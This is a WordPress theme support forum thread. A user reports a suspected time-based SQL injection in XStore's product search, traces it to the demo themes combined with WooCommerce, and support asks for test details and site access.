Return to previous page

Potential SQL Injection Vulnerability – Search Functionality

This topic has 9 replies, 2 voices, and was last updated 3 weeks, 1 day ago ago by Andrew Mitchell

Downlore

Participant

February 16, 2026 at 19:08

Hello XStore Support Team,

I hope you are doing well.

I am currently using the latest version of XStore Core, and all plugins and WordPress core are fully updated. However, I am still experiencing what appears to be a potential SQL injection issue related to the product search functionality.

When testing certain search parameters, I noticed abnormal database behavior that may indicate improper handling of user input. Specifically, when performing a time-based SQL injection test (using a SLEEP function), the website response is noticeably delayed, which suggests that the injected query may be reaching the database layer.

The issue persists even after updating to the most recent version of XStore Core.

Could you please confirm:

Whether there are any known SQL injection vulnerabilities related to the search functionality.

If there are additional security patches or configuration steps required.

Whether this issue has already been addressed in a newer build or hotfix.

I can provide further technical details, logs, or query outputs if needed.

Thank you for your support, and I look forward to your response.

Best regards,
Mohamed Salih

#466059 Copied

8 Answers

Andrew Mitchell

Support staff

February 17, 2026 at 10:39

Hello, Downlore,

Please provide us with any additional information you have obtained as a result of the testing. We would also like to inform you that we are using all possible methods to filter search queries.

Best regards,
8Theme Team

#466096 Copied

Downlore

Participant

February 17, 2026 at 18:41

Hello XStore Support Team,

I hope you are doing well.

I am currently using the latest version of XStore Core. All plugins are fully updated, and my website is running the latest version of WordPress (6.9.1). Despite this, I am still experiencing what appears to be a potential SQL injection issue related to the product search functionality.

When testing certain search parameters, I noticed abnormal database behavior that may indicate improper handling of user input. Specifically, when performing a time-based SQL injection test (using a SLEEP function), the website response is noticeably delayed, which suggests that the injected query may be reaching the database layer.

The issue persists even after updating to the most recent version of XStore Core.

Thank you for your support, and I look forward to your response.

Best regards,

Please contact administrator
for this information.

#466120 Copied

Andrew Mitchell

Support staff

February 18, 2026 at 09:21

Hello, Downlore,

Thank you for providing the sample request. We have conducted tests and found that it does not work on our default installation and has no effect on the server response speed (please see the attached video). Kindly review any third-party plugins, as one of them might be affected.

Best regards,
8Theme Team

Files is visible for topic creator and
support staff only.

#466137 Copied

Downlore

Participant

February 18, 2026 at 19:38

Hello,
After further testing, I can confirm that your plugin alone does not show the vulnerability.
However, when I activate WooCommerce together with XStore Core, the issue appears and the SQL injection test starts working, causing the website to sleep (delayed response).
When I deactivate WooCommerce, the website no longer sleeps and works normally.
Since my website is an online store, WooCommerce is essential and cannot be removed. I need WooCommerce to keep the store functioning properly.
Could you please investigate the compatibility between XStore Core and WooCommerce and advise on a fix?
Thank you.

#466174 Copied

Downlore

Participant

February 18, 2026 at 22:34

I’ve done further testing and it seems the problem is related to your demo themes.

I installed an external theme for testing and activated WooCommerce along with XStore Core. In this setup, the issue does not occur. The website works normally.

However, when I switch to any of the demo themes provided with XStore, the problem appears, causing the website to sleep and the vulnerability to be exploitable.

This indicates that the issue originates from the demo themes, not the plugin itself.

Please advise on how this can be resolved, as I need WooCommerce active for my online store.

Thank you.

#466175 Copied

Andrew Mitchell

Support staff

February 19, 2026 at 09:40

Hello, Downlore,

Could you please provide temporary wp-admin and FTP access? We will check what can be done to help you.
To grant WP-Admin access, please proceed to create a new user account with an administrator role through your WordPress Dashboard. Once the account is established, you may securely transmit the username and password to us via the Private Content section designated for this purpose.

For FTP access, we require the following details: FTP host, FTP username, FTP password, FTP port, and FTP encryption type. If you need assistance in creating these credentials, please reach out to your hosting provider who will guide you through the process.

Best Regards,
8Theme’s Team

#466179 Copied

Downlore

Participant

February 19, 2026 at 21:46

Hello,

Thank you for your response. I am currently preparing the WP-Admin and SFTP/FTP access details as requested. I will provide you with all the necessary credentials via the private content section very soon.

Best regards,

#466237 Copied

Andrew Mitchell

Support staff

February 20, 2026 at 14:09

Hi,

Ok. Please take your time.

Best regards,
The 8Theme Team

#466276 Copied
Viewing 9 results - 1 through 9 (of 9 total)